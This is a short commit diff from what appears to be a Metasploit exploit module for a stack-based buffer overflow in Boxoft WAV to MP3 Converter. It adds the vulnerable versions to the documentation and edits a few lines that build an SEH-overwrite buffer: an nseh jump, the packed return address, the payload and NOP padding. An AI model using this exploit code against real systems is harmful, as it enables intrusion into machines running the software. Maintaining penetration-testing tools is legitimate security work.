added target versions to documentation
parent
3b5555542c
commit
54fce378fa
|
@ -1,7 +1,7 @@
|
|||
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits a stack-based buffer overflow in Boxoft WAV to MP3 Converter.
|
||||
This module exploits a stack-based buffer overflow in Boxoft WAV to MP3 Converter v1.0-v1.1.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
|
|
|
@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
buf << "\xeb\x06\x90\x90" # nseh -- jump to shellcode
|
||||
buf << [target.ret].pack("V*") # seh
|
||||
buf << file_payload
|
||||
buf << make_fast_nops(5860) # end of shellcode
|
||||
buf << make_fast_nops(5860)
|
||||
|
||||
file_create(buf)
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue